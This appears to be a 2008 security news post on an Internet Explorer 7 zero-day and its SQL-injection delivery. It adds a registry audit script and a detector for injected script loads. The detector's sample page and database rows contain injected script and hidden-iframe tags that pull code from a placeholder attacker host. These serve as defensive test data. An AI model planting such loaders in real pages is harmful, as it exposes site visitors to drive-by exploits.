Innovation in Information Security

Coverage of important Information Security and Information Technology news and events from the research team at Sûnnet Beskerming.

An Interesting Internet Explorer 0-day

News of what is the closest thing to a widespread 0-day attack against Internet Explorer for some time has been spreading across the Internet, complete with fully described exploit code available from a number of sources, such as the dependable milw0rm.

Microsoft's own advisory on the vulnerability identifies the vulnerable platform as Internet Explorer 7 on Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. Microsoft has identified that setting the Internet zone security level to High blocks the current implementations of the attack, and that running Internet Explorer with Data Execution Prevention (DEP) enabled limits the attacker's options: it makes the current exploit code harder to turn into code execution, although it does not remove the underlying flaw.

The biggest problem with the High setting on the Internet zone is that it effectively disables ActiveX and Active Scripting for every site that has not previously been added to the Trusted sites zone. For many users this step will cause significant usability difficulties on the sites they visit regularly, and, as described below, the use of this vulnerability in blended attacks means that even a trusted site can start serving the exploit within a very short period of time.
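Because the High setting is the one mitigation Microsoft offers that actually blocks the current exploit code, it is worth verifying that it took effect rather than trusting the dialog box (group policy or a badly behaved installer can change it back). The following is an added example, not code from the original article or from Microsoft: it parses the text that `reg export` writes for the per-user Internet zone key and checks the three values the High template is known to set. The two exports embedded below are constructed for the example; the value names `1200` (Run ActiveX controls and plug-ins) and `1400` (Active scripting) and the level constants are the documented Internet Explorer URL-action values.

```python
"""Audit an exported Internet Explorer 'Internet' zone key for the High-level
mitigation described in the article (zone at High, ActiveX and Active
Scripting disabled).

Added example, not from the original article.  Input is the text produced by
    reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" zone3.reg
The two exports below are constructed for this example.
"""
import re

# Per-user key for zone 3 (Internet).  Values absent here fall back to the
# machine-wide template, so an absent value is reported as a finding.
ZONE_INTERNET = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
                 r"\Internet Settings\Zones\3")
LEVEL_HIGH = 0x12000          # CurrentLevel written by the High template
ACTION_DISABLE = 3            # URL-action values: 0 enable, 1 prompt, 3 disable
RUN_ACTIVEX = "1200"          # "Run ActiveX controls and plug-ins"
ACTIVE_SCRIPTING = "1400"     # "Active scripting"

_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_dwords(text, key):
    """Return {name: int} for the dword values listed under `key` in a .reg export."""
    values, in_key = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key.lower()
            continue
        m = _DWORD_RE.match(line)
        if in_key and m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def audit_internet_zone(reg_text):
    """Return a list of findings; an empty list means the High mitigation holds."""
    v = parse_reg_dwords(reg_text, ZONE_INTERNET)
    findings = []
    level = v.get("CurrentLevel")
    if level != LEVEL_HIGH:
        shown = "missing" if level is None else f"0x{level:x}"
        findings.append(f"CurrentLevel is {shown}, expected High (0x{LEVEL_HIGH:x})")
    for name, label in ((RUN_ACTIVEX, "Run ActiveX controls and plug-ins"),
                        (ACTIVE_SCRIPTING, "Active scripting")):
        if v.get(name) != ACTION_DISABLE:
            findings.append(f"{label} ({name}) is not disabled")
    return findings


# Constructed export of a zone that has been set to High.
EXPORT_HIGH = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"CurrentLevel"=dword:00012000
"1200"=dword:00000003
"1400"=dword:00000003
"""

# Constructed export of the IE7 default (Medium-high, 0x11500): ActiveX and
# scripting are enabled, so the exploit pages described in the article run.
EXPORT_DEFAULT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"CurrentLevel"=dword:00011500
"1200"=dword:00000000
"1400"=dword:00000000
"""

if __name__ == "__main__":
    for label, export in (("high", EXPORT_HIGH), ("default", EXPORT_DEFAULT)):
        print(label, audit_internet_zone(export) or "OK")
```

To run it against a real machine, export the key as shown in the docstring and pass the file contents to `audit_internet_zone`; on Vista and later `reg export` writes UTF-16, so open the file with `encoding="utf-16"`. The audit does not cover the DEP recommendation, which is a process setting rather than a zone value.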

Several different versions of the exploit are already available, varying in how they fill the arrays before triggering the bug (the heap spray that positions the payload in memory) and in exactly how the trigger itself is launched. From the ISC write-up, it seems that many of the sites currently using this vulnerability against Windows XP, Vista, and 2008 users are running the version (or a derivative) that the ISC initially received. The milw0rm version is slightly different in makeup and is expected to become the dominant one once other malware distributors pick up this distribution method.

The ISC write-up also highlights the vulnerability's appearance in blended attacks: SQL injection is used as the delivery vector to implant an infected link (a script tag pointing at the attacker's server) in a legitimate site's content, so that every page rendering that content silently loads the Internet Explorer 0-day for its visitors.
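Site owners cannot rely on the browser-side mitigation to protect their visitors, so the practical check on the server side is to look at what the site is actually serving. The following is an added example, not code from the original article or the ISC write-up: it parses rendered HTML (or the raw text of database columns) and reports every script, iframe, object or embed load whose host is not on a first-party allow-list, which is exactly the pattern the mass SQL-injection campaigns produce. The sample page, the database rows and the host names `example.com` and `attacker.example` are all constructed placeholders, not real indicators.

```python
"""Find third-party script/iframe loads injected into a site's content.

Added example, not from the original article.  The blended attacks described
there append a <script src=...> tag to text columns via SQL injection; every
page that renders the column then loads the attacker's script.  Sample data
below is constructed; 'attacker.example' is a placeholder, not an indicator.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

FIRST_PARTY = {"www.example.com", "static.example.com"}  # assumed allow-list


class LoaderCollector(HTMLParser):
    """Collect every tag that makes the browser fetch and run remote content."""
    LOADERS = {"script", "iframe", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.loads = []  # (tag, src, line number in the input)

    def handle_starttag(self, tag, attrs):
        if tag in self.LOADERS:
            a = dict(attrs)
            src = a.get("src") or a.get("data")   # <object data=...> also loads
            if src:
                self.loads.append((tag, src, self.getpos()[0]))


def external_host(src):
    """Host of an absolute or protocol-relative URL; None for relative paths."""
    host = urlsplit(src.strip()).hostname
    return host.lower() if host else None


def find_injected(html, allowed=FIRST_PARTY):
    """Return (tag, src, line) for each loader pointing off the allow-list.

    The parser does not care about document structure, so a tag appended
    after </html> (typical of an injected column) is still reported.
    """
    p = LoaderCollector()
    p.feed(html)
    p.close()
    return [(tag, src, line) for tag, src, line in p.loads
            if (host := external_host(src)) and host not in allowed]


def suspicious_rows(rows, allowed=FIRST_PARTY):
    """Given (row_id, text) pairs dumped from a content table, return the ids
    whose text carries an off-site loader.  Injected markup was usually
    unquoted and appended to the end of the legitimate value."""
    return [row_id for row_id, text in rows if find_injected(text, allowed)]


# Constructed page: two legitimate loads and one injected after the content.
SAMPLE_PAGE = """<html><head><title>Products</title>
<script src="/js/app.js"></script>
<script src="http://static.example.com/lib.js"></script></head>
<body><h1>Widget</h1><p>Best widget</p><script src=http://attacker.example/ngg.js></script>
</body></html>"""

# Constructed dump of a text column after a mass-injection run.
SAMPLE_ROWS = [
    (1, "Blue widget, 10cm"),
    (2, "Red widget, 12cm<script src=http://attacker.example/ngg.js></script>"),
    (3, "Green widget<iframe src=//attacker.example/f.htm width=0 height=0></iframe>"),
]

if __name__ == "__main__":
    for hit in find_injected(SAMPLE_PAGE):
        print("page:", hit)
    print("rows:", suspicious_rows(SAMPLE_ROWS))
```

Run it over a crawl of the site's rendered pages and, separately, over a dump of every free-text column the pages render; the second pass finds the injected rows that need cleaning, and the first confirms the fix once the input validation that allowed the injection has been repaired.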

Until detection has been added to the major antimalware engines and Microsoft has released a patch addressing the issue, users are recommended to consider an alternate browser for their Internet use (the preferred solution), or to apply the non-patch mitigations recommended by Microsoft and listed above.

11 December 2008
